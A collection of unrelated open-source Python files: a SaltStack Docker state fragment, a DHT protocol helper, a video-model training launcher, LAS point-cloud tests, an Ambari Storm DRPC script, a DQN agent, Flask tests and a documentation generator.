if not remove_status['status']:
return _invalid(comment='Failed to remove outdated container {0!r}'.format(name))
already_exists = False
# now it's clear, the name is available for the new container
if __opts__['test']:
comment = 'Will create container {0!r}'.format(name)
return _ret_status(name=name, comment=comment)
# parse input data
exposeports, bindports, contvolumes, bindvolumes, denvironment, changes = [], {}, [], {}, {}, []
if not ports:
ports = {}
if not volumes:
volumes = {}
if not volumes_from:
volumes_from = []
if isinstance(environment, dict):
for key in environment:
denvironment[six.text_type(key)] = six.text_type(environment[key])
if isinstance(environment, list):
for var in environment:
if isinstance(var, dict):
for key in var:
denvironment[six.text_type(key)] = six.text_type(var[key])
if isinstance(volumes, dict):
bindvolumes = volumes
if isinstance(volumes, list):
for vol in volumes:
if isinstance(vol, dict):
# get source as the dict key
source = list(vol.keys())[0]
# then find target
if isinstance(vol[source], dict):
target = vol[source]['bind']
read_only = vol[source].get('ro', False)
else:
target = str(vol[source])
read_only = False
bindvolumes[source] = {'bind': target,
'ro': read_only
}
else:
# assume just an own volumes
contvolumes.append(str(vol))
if isinstance(ports, dict):
bindports = ports
# in dict form all ports bind, so no need for exposeports
if isinstance(ports, list):
for port in ports:
if isinstance(port, dict):
container_port = list(port.keys())[0]
# find target
if isinstance(port[container_port], dict):
host_port = port[container_port]['HostPort']
host_ip = port[container_port].get('HostIp', '0.0.0.0')
else:
host_port = str(port[container_port])
host_ip = '0.0.0.0'
bindports[container_port] = {
'HostPort': host_port,
'HostIp': host_ip
}
else:
# assume just a port to expose
exposeports.append(str(port))
parsed_volumes = _parse_volumes(volumes)
bindvolumes = parsed_volumes['bindvols']
contvolumes = parsed_volumes['contvols']
if not already_exists:
kwargs = dict(command=command,
hostname=hostname,
user=user,
detach=detach,
stdin_open=stdin_open,
tty=tty,
mem_limit=mem_limit,
ports=exposeports,
environment=denvironment,
dns=dns,
binds=bindvolumes,
volumes=contvolumes,
name=name,
cpu_shares=cpu_shares,
cpuset=cpuset)
out = create(image_name, **kwargs)
# if container has been created, even if not started, we mark
# it as installed
try:
cid = out['out']['info']['id']
log.debug(str(cid))
except Exception as e:
changes.append('Container created')
log.debug(str(e))
else:
changes.append('Container {0} created'.format(cid))
if start:
started = __salt__['docker.start'](name,
binds=bindvolumes,
port_bindings=bindports,
lxc_conf=lxc_conf,
publish_all_ports=publish_all_ports,
links=links,
privileged=privileged,
dns=dns,
volumes_from=volumes_from,
network_mode=network_mode,
restart_policy=restart_policy,
cap_add=cap_add,
cap_drop=cap_drop)
if check_is_running:
is_running = __salt__['docker.is_running'](name)
log.debug("Docker-io running:" + str(started))
log.debug("Docker-io running:" + str(is_running))
if is_running:
changes.append('Container {0!r} started.\n'.format(name))
else:
return _invalid(comment=('Container {0!r} cannot be started\n{1!s}'
.format(name, started['out'],)))
else:
changes.append('Container {0!r} started.\n'.format(name))
return _valid(comment='\n'.join(changes), changes={name: True})
|
py | 7dfa064d34a5d21bc201ac2f265e81bffc81b71d | #!/usr/bin/env python
__author__ = "bt3"
import sys
def grep_word_from_files():
''' using iterator enumerate to create a grep command '''
word = sys.argv[1]
for filename in sys.argv[2:]:
with open(filename) as file:
for lino, line in enumerate(file, start=1):
if word in line:
print("{0}:{1}:{2:.40}".format(filename, lino, line.rstrip()))
if __name__ == '__main__':
if len(sys.argv) < 2:
print("Usage: grep_word_from_files.py word infile1 [infile2...]")
sys.exit()
else:
grep_word_from_files()
|
py | 7dfa09a2622fd8cef0e6c902a11e115364038d86 | import socket
import struct
from TorrentPython.Bencode import *
class DHTProtocol(object):
COMPACT_NODE_INFO_LENGTH = 26 # byte
@staticmethod
def get_ping(client_id: bytes):
return Bencode.encode(
{b't': b'aa', b'y': b'q', b'q': b'ping', b'a': {b'id': client_id}})
@staticmethod
def get_peers(client_id: bytes, info_hash: bytes):
if len(info_hash) is not 20:
return None
return Bencode.encode(
{b't': b'aa', b'y': b'q', b'q': b'get_peers', b'a': {b'id': client_id, b'info_hash': info_hash}})
@staticmethod
def is_response(response: dict):
return b'r' in response
@staticmethod
def parse_peers(response: dict):
peers = []
nodes = {}
if not DHTProtocol.is_response(response):
return peers, nodes
source = response.get(b'r').get(b'values')
if source:
for sample in source:
peers.append((socket.inet_ntoa(sample[:4]), struct.unpack('!H', sample[4:4 + 2])[0]))
source = response.get(b'r').get(b'nodes')
if source:
for idx in range(0, len(source), DHTProtocol.COMPACT_NODE_INFO_LENGTH):
sample = source[idx:idx + DHTProtocol.COMPACT_NODE_INFO_LENGTH]
nodes[sample[:20]] = (socket.inet_ntoa(sample[20:20 + 4]), struct.unpack('!H', sample[24:24 + 2])[0])
return peers, nodes
|
py | 7dfa0a3d4ac94c7f4f0d832003d071aeb1bb865f | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
"""Wrapper to train and test a video classification model."""
import argparse
import sys
import torch
import slowfast.utils.checkpoint as cu
import slowfast.utils.multiprocessing as mpu
from slowfast.config.defaults import get_cfg
from test_net import test
from train_net import train
def parse_args():
"""
Parse the following arguments for the video training and testing pipeline.
Args:
shard_id (int): shard id for the current machine. Starts from 0 to
num_shards - 1. If single machine is used, then set shard id to 0.
num_shards (int): number of shards using by the job.
init_method (str): initialization method to launch the job with multiple
devices. Options includes TCP or shared file-system for
initialization. details can be find in
https://pytorch.org/docs/stable/distributed.html#tcp-initialization
cfg (str): path to the config file.
opts (argument): provide addtional options from the command line, it
overwrites the config loaded from file.
"""
parser = argparse.ArgumentParser(
description="Provide SlowFast video training and testing pipeline."
)
parser.add_argument(
"--shard_id",
help="The shard id of current node, Starts from 0 to num_shards - 1",
default=0,
type=int,
)
parser.add_argument(
"--num_shards",
help="Number of shards using by the job",
default=1,
type=int,
)
parser.add_argument(
"--init_method",
help="Initialization method, includes TCP or shared file-system",
default="tcp://localhost:9999",
type=str,
)
# 'configs/VidOR/I3D_8x8_R50.yaml'
# 'configs/VidOR/SLOWFAST_8x8_R50.yaml'
parser.add_argument(
"--cfg",
dest="cfg_file",
help="Path to the config file",
default='configs/VidOR/SLOWFAST_8x8_R50.yaml',
type=str,
)
parser.add_argument(
"opts",
help="See slowfast/config/defaults.py for all options",
default=None,
nargs=argparse.REMAINDER,
)
if len(sys.argv) == 1:
parser.print_help()
return parser.parse_args()
def load_config(args):
"""
Given the arguemnts, load and initialize the configs.
Args:
args (argument): arguments includes `shard_id`, `num_shards`,
`init_method`, `cfg_file`, and `opts`.
"""
# Setup cfg.
cfg = get_cfg()
# Load config from cfg.
if args.cfg_file is not None:
cfg.merge_from_file(args.cfg_file)
# Load config from command line, overwrite config from opts.
if args.opts is not None:
cfg.merge_from_list(args.opts)
# Inherit parameters from args.
if hasattr(args, "num_shards") and hasattr(args, "shard_id"):
cfg.NUM_SHARDS = args.num_shards
cfg.SHARD_ID = args.shard_id
if hasattr(args, "rng_seed"):
cfg.RNG_SEED = args.rng_seed
if hasattr(args, "output_dir"):
cfg.OUTPUT_DIR = args.output_dir
# Create the checkpoint dir.
cu.make_checkpoint_dir(cfg.OUTPUT_DIR)
return cfg
def main():
"""
Main function to spawn the train and test process.
"""
args = parse_args()
cfg = load_config(args)
# Perform training.
if cfg.TRAIN.ENABLE:
if cfg.NUM_GPUS > 1:
torch.multiprocessing.spawn(
mpu.run,
nprocs=cfg.NUM_GPUS,
args=(
cfg.NUM_GPUS,
train,
args.init_method,
cfg.SHARD_ID,
cfg.NUM_SHARDS,
cfg.DIST_BACKEND,
cfg,
),
daemon=False,
)
else:
train(cfg=cfg)
# Perform multi-clip testing.
if cfg.TEST.ENABLE:
if cfg.NUM_GPUS > 1:
torch.multiprocessing.spawn(
mpu.run,
nprocs=cfg.NUM_GPUS,
args=(
cfg.NUM_GPUS,
test,
args.init_method,
cfg.SHARD_ID,
cfg.NUM_SHARDS,
cfg.DIST_BACKEND,
cfg,
),
daemon=False,
)
else:
test(cfg=cfg)
if __name__ == "__main__":
torch.multiprocessing.set_start_method("forkserver")
main()
|
py | 7dfa0a7a0265e9df951d9eb4b42fa0225344423e | import io
import numpy as np
import pytest
import pylas
from pylas import PointFormat
from pylastests.test_common import write_then_read_again, simple_las, test1_4_las
@pytest.fixture()
def file1_4():
return pylas.read(test1_4_las)
@pytest.fixture()
def file():
return pylas.read(simple_las)
def test_xyz():
las = pylas.create()
shape = (150,)
las.X = np.zeros(shape, dtype=np.int32)
las.Y = np.ones(shape, dtype=np.int32)
las.Z = np.zeros(shape, dtype=np.int32)
las.Z[:] = -152
las = write_then_read_again(las)
assert np.alltrue(las.X == 0)
assert np.alltrue(las.Y == 1)
assert np.alltrue(las.Z == -152)
def test_wrong_version():
for i in range(6, 8):
with pytest.raises(pylas.errors.PylasError):
_ = pylas.create(point_format=i, file_version="1.2")
def test_good_version_is_used():
for i in range(6, 8):
las = pylas.create(point_format=i)
assert las.header.version.major == 1
assert las.header.version.minor == 4
def test_create_fmt_0():
new = pylas.create(point_format=0)
with pytest.raises(ValueError):
new.red = np.zeros(len(new.points), np.uint16)
with pytest.raises(ValueError):
new.red = np.zeros(len(new.points), np.uint16)
with pytest.raises(ValueError):
new.red = np.zeros(len(new.points), np.uint16)
with pytest.raises(ValueError):
new.gps_time = np.zeros(len(new.points), np.float64)
def test_create_fmt_1():
new = pylas.create(point_format=1)
with pytest.raises(ValueError):
new.red = np.zeros(len(new.points), np.uint16)
with pytest.raises(ValueError):
new.red = np.zeros(len(new.points), np.uint16)
with pytest.raises(ValueError):
new.red = np.zeros(len(new.points), np.uint16)
gps_time = np.random.uniform(0, 25641, len(new.points))
new.gps_time = gps_time
assert np.allclose(new.gps_time, gps_time)
new = write_then_read_again(new)
assert np.allclose(new.gps_time, gps_time)
def test_create_fmt_2(file):
new = pylas.create(point_format=2)
with pytest.raises(ValueError):
new.gps_time = file.gps_time
new.red = file.red
new.green = file.green
new.blue = file.blue
assert np.allclose(new.red, file.red)
assert np.allclose(new.green, file.green)
assert np.allclose(new.blue, file.blue)
new = write_then_read_again(new)
assert np.allclose(new.red, file.red)
assert np.allclose(new.green, file.green)
assert np.allclose(new.blue, file.blue)
def test_create_fmt_3(file):
new = pylas.create(point_format=3)
new.red = file.red
new.green = file.green
new.blue = file.blue
new.gps_time = file.gps_time
assert np.allclose(new.red, file.red)
assert np.allclose(new.green, file.green)
assert np.allclose(new.blue, file.blue)
assert np.allclose(new.gps_time, file.gps_time)
new = write_then_read_again(new)
assert np.allclose(new.red, file.red)
assert np.allclose(new.green, file.green)
assert np.allclose(new.blue, file.blue)
assert np.allclose(new.gps_time, file.gps_time)
def test_create_fmt_6(file1_4):
new = pylas.create(point_format=6)
assert str(new.header.version) == "1.4"
dim_names_fmt_6 = PointFormat(6).dtype().names
for dim_name in dim_names_fmt_6:
new[dim_name] = file1_4[dim_name]
for dim_name in dim_names_fmt_6:
assert np.allclose(new[dim_name], file1_4[dim_name]), "{} not equal".format(
dim_name
)
new = write_then_read_again(new)
for dim_name in dim_names_fmt_6:
assert np.allclose(new[dim_name], file1_4[dim_name]), "{} not equal".format(
dim_name
)
@pytest.mark.parametrize("laz_backend", (None,) + pylas.LazBackend.detect_available())
def test_writing_empty_file(laz_backend):
las = pylas.create()
with io.BytesIO() as out:
if laz_backend is None:
las.write(out)
else:
las.write(out, laz_backend=laz_backend)
|
py | 7dfa0b90ce1f6624823373f93d9226e0de139073 | #!/usr/bin/env python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys
from resource_management.libraries.functions import check_process_status
from resource_management.libraries.script import Script
from resource_management.libraries.functions import conf_select
from resource_management.libraries.functions import hdp_select
from resource_management.libraries.functions import format
from resource_management.core.resources.system import Execute
from resource_management.libraries.functions.version import compare_versions, format_hdp_stack_version
from storm import storm
from service import service
from service_check import ServiceCheck
from resource_management.libraries.functions.security_commons import build_expectations, \
cached_kinit_executor, get_params_from_filesystem, validate_security_config_properties, \
FILE_TYPE_JAAS_CONF
class DrpcServer(Script):
def get_stack_to_component(self):
return {"HDP": "storm-client"}
def install(self, env):
self.install_packages(env)
self.configure(env)
def configure(self, env):
import params
env.set_params(params)
storm()
def pre_upgrade_restart(self, env, upgrade_type=None):
import params
env.set_params(params)
if params.version and compare_versions(format_hdp_stack_version(params.version), '2.2.0.0') >= 0:
conf_select.select(params.stack_name, "storm", params.version)
hdp_select.select("storm-client", params.version)
def start(self, env, upgrade_type=None):
import params
env.set_params(params)
self.configure(env)
service("drpc", action="start")
def stop(self, env, upgrade_type=None):
import params
env.set_params(params)
service("drpc", action="stop")
def status(self, env):
import status_params
env.set_params(status_params)
check_process_status(status_params.pid_drpc)
def security_status(self, env):
import status_params
env.set_params(status_params)
if status_params.security_enabled:
# Expect the following files to be available in status_params.config_dir:
# storm_jaas.conf
try:
props_value_check = None
props_empty_check = ['StormServer/keyTab', 'StormServer/principal']
props_read_check = ['StormServer/keyTab']
storm_env_expectations = build_expectations('storm_jaas', props_value_check, props_empty_check,
props_read_check)
storm_expectations = {}
storm_expectations.update(storm_env_expectations)
security_params = get_params_from_filesystem(status_params.conf_dir,
{'storm_jaas.conf': FILE_TYPE_JAAS_CONF})
result_issues = validate_security_config_properties(security_params, storm_expectations)
if not result_issues: # If all validations passed successfully
# Double check the dict before calling execute
if ( 'storm_jaas' not in security_params
or 'StormServer' not in security_params['storm_jaas']
or 'keyTab' not in security_params['storm_jaas']['StormServer']
or 'principal' not in security_params['storm_jaas']['StormServer']):
self.put_structured_out({"securityState": "ERROR"})
self.put_structured_out({"securityIssuesFound": "Keytab file or principal are not set property."})
return
cached_kinit_executor(status_params.kinit_path_local,
status_params.storm_user,
security_params['storm_jaas']['StormServer']['keyTab'],
security_params['storm_jaas']['StormServer']['principal'],
status_params.hostname,
status_params.tmp_dir)
self.put_structured_out({"securityState": "SECURED_KERBEROS"})
else:
issues = []
for cf in result_issues:
issues.append("Configuration file %s did not pass the validation. Reason: %s" % (cf, result_issues[cf]))
self.put_structured_out({"securityIssuesFound": ". ".join(issues)})
self.put_structured_out({"securityState": "UNSECURED"})
except Exception as e:
self.put_structured_out({"securityState": "ERROR"})
self.put_structured_out({"securityStateErrorInfo": str(e)})
else:
self.put_structured_out({"securityState": "UNSECURED"})
if __name__ == "__main__":
DrpcServer().execute()
|
py | 7dfa0de2286a470de79d0ee3a24fdcc6cbd7d1d4 | #######################################################################
# Copyright (C) 2017 Shangtong Zhang([email protected]) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
from network import *
from component import *
from utils import *
import numpy as np
import time
import os
import pickle
import torch
# This HRA DQN with removing irrelevant features
class MSDQNAgent:
def __init__(self, config):
self.config = config
self.learning_network = config.network_fn(config.optimizer_fn)
self.target_network = config.network_fn(config.optimizer_fn)
self.target_network.load_state_dict(self.learning_network.state_dict())
self.task = config.task_fn()
self.replay = config.replay_fn()
self.policy = config.policy_fn()
self.total_steps = 0
def episode(self, deterministic=False):
episode_start_time = time.time()
state = self.task.reset()
total_reward = 0.0
steps = 0
while True:
value = self.learning_network.predict(np.stack([state]), True)
value = value.cpu().data.numpy().flatten()
if deterministic:
action = np.argmax(value)
elif self.total_steps < self.config.exploration_steps:
action = np.random.randint(0, len(value))
else:
action = self.policy.sample(value)
next_state, reward, done, info = self.task.step(action)
done = (done or (self.config.max_episode_length and steps > self.config.max_episode_length))
if not deterministic:
self.replay.feed([state, action, reward, next_state, int(done)])
self.total_steps += 1
total_reward += np.sum(reward * self.config.reward_weight)
steps += 1
state = next_state
if done:
break
if not deterministic and self.total_steps > self.config.exploration_steps:
experiences = self.replay.sample()
states, actions, rewards, next_states, terminals = experiences
if self.config.hybrid_reward:
q_next = self.target_network.predict(next_states, False)
target = []
for q_next_ in q_next:
if self.config.target_type == self.config.q_target:
target.append(q_next_.detach().max(1)[0])
elif self.config.target_type == self.config.expected_sarsa_target:
target.append(q_next_.detach().mean(1))
target = torch.cat(target, dim=1).detach()
terminals = self.learning_network.to_torch_variable(terminals).unsqueeze(1)
rewards = self.learning_network.to_torch_variable(rewards)
target = self.config.discount * target * (1 - terminals.expand_as(target))
target.add_(rewards)
q = self.learning_network.predict(states, False)
q_action = []
actions = self.learning_network.to_torch_variable(actions, 'int64').unsqueeze(1)
for q_ in q:
q_action.append(q_.gather(1, actions))
q_action = torch.cat(q_action, dim=1)
loss = self.learning_network.criterion(q_action, target)
else:
q_next = self.target_network.predict(next_states, True).detach()
if self.config.double_q:
_, best_actions = self.learning_network.predict(next_states).detach().max(1)
q_next = q_next.gather(1, best_actions)
else:
q_next, _ = q_next.max(1)
terminals = self.learning_network.to_torch_variable(terminals).unsqueeze(1)
rewards = np.sum(rewards * self.config.reward_weight, axis=1)
rewards = self.learning_network.to_torch_variable(rewards).unsqueeze(1)
q_next = self.config.discount * q_next * (1 - terminals)
q_next.add_(rewards)
actions = self.learning_network.to_torch_variable(actions, 'int64').unsqueeze(1)
q = self.learning_network.predict(states, True)
q = q.gather(1, actions)
loss = self.learning_network.criterion(q, q_next)
self.learning_network.zero_grad()
loss.backward()
self.learning_network.optimizer.step()
if not deterministic and self.total_steps % self.config.target_network_update_freq == 0:
self.target_network.load_state_dict(self.learning_network.state_dict())
if not deterministic and self.total_steps > self.config.exploration_steps:
self.policy.update_epsilon()
episode_time = time.time() - episode_start_time
self.config.logger.debug('episode steps %d, episode time %f, time per step %f' %
(steps, episode_time, episode_time / float(steps)))
return total_reward, steps
|
py | 7dfa0e0584de804f46d0c014eae698b615ac3dfd | # coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Exception Class
# this is a auto generated file generated by Cheetah
# Namespace: com.sun.star.document
# Libre Office Version: 7.3
from typing import TYPE_CHECKING
from ooo.oenv.env_const import UNO_ENVIRONMENT, UNO_RUNTIME
if (not TYPE_CHECKING) and UNO_RUNTIME and UNO_ENVIRONMENT:
import uno
def _get_class():
orig_init = None
ordered_keys = ('Message', 'Context')
def init(self, *args, **kwargs):
if len(kwargs) == 0 and len(args) == 1 and getattr(args[0], "__class__", None) == self.__class__:
orig_init(self, args[0])
return
kargs = kwargs.copy()
for i, arg in enumerate(args):
kargs[ordered_keys[i]] = arg
orig_init(self, **kargs)
type_name = 'com.sun.star.document.EmptyUndoStackException'
ex = uno.getClass(type_name)
ex.__ooo_ns__ = 'com.sun.star.document'
ex.__ooo_full_ns__= type_name
ex.__ooo_type_name__ = 'exception'
orig_init = ex.__init__
ex.__init__ = init
return ex
EmptyUndoStackException = _get_class()
else:
from ...lo.document.empty_undo_stack_exception import EmptyUndoStackException as EmptyUndoStackException
__all__ = ['EmptyUndoStackException']
|
py | 7dfa0ef4b7969aa144bf8eb4af94eae66c82a60d | import os
import flaskr
import unittest
import tempfile
class FlaskrTestCase(unittest.TestCase):
def setUp(self):
self.db_fd, flaskr.app.config['DATABASE'] = tempfile.mkstemp()
flaskr.app.config['TESTING'] = True
self.app = flaskr.app.test_client()
flaskr.init_db()
def tearDown(self):
os.close(self.db_fd)
os.unlink(flaskr.app.config['DATABASE'])
def test_empty_db(self):
rv = self.app.get('/')
assert b'No entries here so far' in rv.data
def login(self, username, password):
return self.app.post('/login', data=dict(
username=username,
password=password
), follow_redirects=True)
def logout(self):
return self.app.get('/logout', follow_redirects=True)
def test_login_logout(self):
rv = self.login('admin', 'default')
assert b'You were logged in' in rv.data
rv = self.logout()
assert b'You were logged out' in rv.data
rv = self.login('adminx', 'default')
assert b'Invalid username' in rv.data
rv = self.login('admin', 'defaultx')
assert b'Invalid password' in rv.data
def test_messages(self):
self.login('admin', 'default')
rv = self.app.post('/add', data=dict(
title='<Hello>',
text='<strong>HTML</strong> allowed here'
), follow_redirects=True)
assert b'No entries here so far' not in rv.data
assert b'<Hello>' in rv.data
assert b'<strong>HTML</strong> allowed here' in rv.data
if __name__ == '__main__':
unittest.main()
|
py | 7dfa0efa264da9ffeea368bebbf9e2e126bd9c0f | import pathlib
import shutil
import keras_autodoc
PAGES = {
"project.md": {
"connection": ["hsfs.connection.Connection"],
"connection_methods": keras_autodoc.get_methods(
"hsfs.connection.Connection", exclude=["connection"]
),
},
"feature_store.md": {
"fs_get": ["hsfs.connection.Connection.get_feature_store"],
"fs_properties": keras_autodoc.get_properties(
"hsfs.feature_store.FeatureStore"
),
"fs_methods": keras_autodoc.get_methods(
"hsfs.feature_store.FeatureStore", exclude=["from_response_json"]
),
},
"feature.md": {
"feature": ["hsfs.feature.Feature"],
"feature_properties": keras_autodoc.get_properties("hsfs.feature.Feature"),
"feature_methods": keras_autodoc.get_methods(
"hsfs.feature.Feature", exclude=["from_response_json", "to_dict"]
),
},
"feature_group.md": {
"fg_create": ["hsfs.feature_store.FeatureStore.create_feature_group"],
"fg_get": ["hsfs.feature_store.FeatureStore.get_feature_group"],
"fg_properties": keras_autodoc.get_properties(
"hsfs.feature_group.FeatureGroup"
),
"fg_methods": keras_autodoc.get_methods(
"hsfs.feature_group.FeatureGroup",
exclude=[
"from_response_json",
"update_from_response_json",
"json",
"to_dict",
],
),
},
"training_dataset.md": {
"td_create": ["hsfs.feature_store.FeatureStore.create_training_dataset"],
"td_get": ["hsfs.feature_store.FeatureStore.get_training_dataset"],
"td_properties": keras_autodoc.get_properties(
"hsfs.training_dataset.TrainingDataset"
),
"td_methods": keras_autodoc.get_methods(
"hsfs.training_dataset.TrainingDataset",
exclude=[
"from_response_json",
"update_from_response_json",
"json",
"to_dict",
],
),
"tf_record_dataset": ["hsfs.core.tfdata_engine.TFDataEngine.tf_record_dataset"],
"tf_csv_dataset": ["hsfs.core.tfdata_engine.TFDataEngine.tf_csv_dataset"],
},
"storage_connector.md": {
"sc_get": [
"hsfs.feature_store.FeatureStore.get_storage_connector",
"hsfs.feature_store.FeatureStore.get_online_storage_connector",
],
"sc_methods": keras_autodoc.get_methods(
"hsfs.storage_connector.StorageConnector", exclude=["from_response_json"]
),
"sc_properties": keras_autodoc.get_properties(
"hsfs.storage_connector.StorageConnector"
),
},
"query_vs_dataframe.md": {
"query_methods": keras_autodoc.get_methods("hsfs.constructor.query.Query"),
"query_properties": keras_autodoc.get_properties(
"hsfs.constructor.query.Query"
),
},
"statistics.md": {
"statistics_config": ["hsfs.statistics_config.StatisticsConfig"],
"statistics_config_properties": keras_autodoc.get_properties(
"hsfs.statistics_config.StatisticsConfig"
),
},
"feature_validation.md": {
"rule": ["hsfs.rule.Rule"],
"rule_properties": keras_autodoc.get_properties("hsfs.rule.Rule"),
"ruledefinition": ["hsfs.ruledefinition.RuleDefinition"],
"ruledefinition_getall": ["hsfs.connection.Connection.get_rules"],
"ruledefinition_get": ["hsfs.connection.Connection.get_rule"],
"ruledefinition_properties": keras_autodoc.get_properties(
"hsfs.ruledefinition.RuleDefinition"
),
"expectation": ["hsfs.expectation.Expectation"],
"expectation_properties": keras_autodoc.get_properties(
"hsfs.expectation.Expectation"
),
"expectation_methods": keras_autodoc.get_methods(
"hsfs.expectation.Expectation",
exclude=[
"from_response_json",
"update_from_response_json",
"json",
"to_dict",
],
),
"expectation_create": ["hsfs.feature_store.FeatureStore.create_expectation"],
"expectation_get": ["hsfs.feature_store.FeatureStore.get_expectation"],
"expectation_getall": ["hsfs.feature_store.FeatureStore.get_expectations"],
"validation_result": ["hsfs.validation_result.ValidationResult"],
"validation_result_properties": keras_autodoc.get_properties(
"hsfs.validation_result.ValidationResult"
),
"validate": ["hsfs.feature_group.FeatureGroup.validate"],
"validation_result_get": ["hsfs.feature_group.FeatureGroup.get_validations"],
},
"tags.md": {
"fg_tag_add": ["hsfs.feature_group.FeatureGroupBase.add_tag"],
"fg_tag_get": ["hsfs.feature_group.FeatureGroupBase.get_tag"],
"fg_tag_get_all": ["hsfs.feature_group.FeatureGroupBase.get_tags"],
"fg_tag_delete": ["hsfs.feature_group.FeatureGroupBase.delete_tag"],
"td_tag_add": ["hsfs.training_dataset.TrainingDataset.add_tag"],
"td_tag_get": ["hsfs.training_dataset.TrainingDataset.get_tag"],
"td_tag_get_all": ["hsfs.training_dataset.TrainingDataset.get_tags"],
"td_tag_delete": ["hsfs.training_dataset.TrainingDataset.delete_tag"],
},
"api/connection_api.md": {
"connection": ["hsfs.connection.Connection"],
"connection_properties": keras_autodoc.get_properties(
"hsfs.connection.Connection"
),
"connection_methods": keras_autodoc.get_methods("hsfs.connection.Connection"),
},
"api/feature_store_api.md": {
"fs": ["hsfs.feature_store.FeatureStore"],
"fs_get": ["hsfs.connection.Connection.get_feature_store"],
"fs_properties": keras_autodoc.get_properties(
"hsfs.feature_store.FeatureStore"
),
"fs_methods": keras_autodoc.get_methods("hsfs.feature_store.FeatureStore"),
},
"api/feature_group_api.md": {
"fg": ["hsfs.feature_group.FeatureGroup"],
"fg_create": ["hsfs.feature_store.FeatureStore.create_feature_group"],
"fg_get": ["hsfs.feature_store.FeatureStore.get_feature_group"],
"fg_properties": keras_autodoc.get_properties(
"hsfs.feature_group.FeatureGroup"
),
"fg_methods": keras_autodoc.get_methods("hsfs.feature_group.FeatureGroup"),
},
"api/training_dataset_api.md": {
"td": ["hsfs.training_dataset.TrainingDataset"],
"td_create": ["hsfs.feature_store.FeatureStore.create_training_dataset"],
"td_get": ["hsfs.feature_store.FeatureStore.get_training_dataset"],
"td_properties": keras_autodoc.get_properties(
"hsfs.training_dataset.TrainingDataset"
),
"td_methods": keras_autodoc.get_methods(
"hsfs.training_dataset.TrainingDataset"
),
},
"api/feature_api.md": {
"feature": ["hsfs.feature.Feature"],
"feature_properties": keras_autodoc.get_properties("hsfs.feature.Feature"),
"feature_methods": keras_autodoc.get_methods("hsfs.feature.Feature"),
},
"api/storage_connector_api.md": {
"sc_get": [
"hsfs.feature_store.FeatureStore.get_storage_connector",
"hsfs.feature_store.FeatureStore.get_online_storage_connector",
],
"sc_methods": keras_autodoc.get_methods(
"hsfs.storage_connector.StorageConnector"
),
"sc_properties": keras_autodoc.get_properties(
"hsfs.storage_connector.StorageConnector"
),
},
"api/statistics_config_api.md": {
"statistics_config": ["hsfs.statistics_config.StatisticsConfig"],
"statistics_config_properties": keras_autodoc.get_properties(
"hsfs.statistics_config.StatisticsConfig"
),
},
"api/rule_api.md": {
"rule": ["hsfs.rule.Rule"],
"rule_properties": keras_autodoc.get_properties("hsfs.rule.Rule"),
},
"api/rule_definition_api.md": {
"ruledefinition": ["hsfs.ruledefinition.RuleDefinition"],
"ruledefinition_getall": ["hsfs.connection.Connection.get_rules"],
"ruledefinition_get": ["hsfs.connection.Connection.get_rule"],
"ruledefinition_properties": keras_autodoc.get_properties(
"hsfs.ruledefinition.RuleDefinition"
),
},
"api/expectation_api.md": {
"expectation": ["hsfs.expectation.Expectation"],
"expectation_properties": keras_autodoc.get_properties(
"hsfs.expectation.Expectation"
),
"expectation_methods": keras_autodoc.get_methods(
"hsfs.expectation.Expectation",
exclude=[
"from_response_json",
"update_from_response_json",
"json",
"to_dict",
],
),
"expectation_create": ["hsfs.feature_store.FeatureStore.create_expectation"],
"expectation_get": ["hsfs.feature_store.FeatureStore.get_expectation"],
"expectation_getall": ["hsfs.feature_store.FeatureStore.get_expectations"],
},
"api/validation_api.md": {
"validation_result": ["hsfs.validation_result.ValidationResult"],
"validation_result_properties": keras_autodoc.get_properties(
"hsfs.validation_result.ValidationResult"
),
"validate": ["hsfs.feature_group.FeatureGroup.validate"],
"validation_result_get": ["hsfs.feature_group.FeatureGroup.get_validations"],
},
}
hsfs_dir = pathlib.Path(__file__).resolve().parents[0]
def generate(dest_dir):
doc_generator = keras_autodoc.DocumentationGenerator(
PAGES,
project_url="https://github.com/logicalclocks/feature-store-api/blob/master/python",
template_dir="./docs/templates",
titles_size="###",
extra_aliases={
"hsfs.core.query.Query": "hsfs.Query",
"hsfs.storage_connector.StorageConnector": "hsfs.StorageConnector",
"hsfs.statistics_config.StatisticsConfig": "hsfs.StatisticsConfig",
"hsfs.training_dataset_feature.TrainingDatasetFeature": "hsfs.TrainingDatasetFeature",
"pandas.core.frame.DataFrame": "pandas.DataFrame",
},
max_signature_line_length=100,
)
shutil.copyfile(hsfs_dir / "CONTRIBUTING.md", dest_dir / "CONTRIBUTING.md")
shutil.copyfile(hsfs_dir / "README.md", dest_dir / "index.md")
doc_generator.generate(dest_dir / "generated")
if __name__ == "__main__":
generate(hsfs_dir / "docs")
|
py | 7dfa0f5351b7b3a6dd32dd3187d8b160bdf68d33 | # Copyright 2017 theloop, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A module for containers on the loopchain """
import logging
import grpc
from enum import Enum
from concurrent import futures
from loopchain.rest_server import RestServer, RestServerRS
from loopchain import configure as conf
from loopchain.baseservice import CommonProcess
from loopchain.protos import loopchain_pb2_grpc
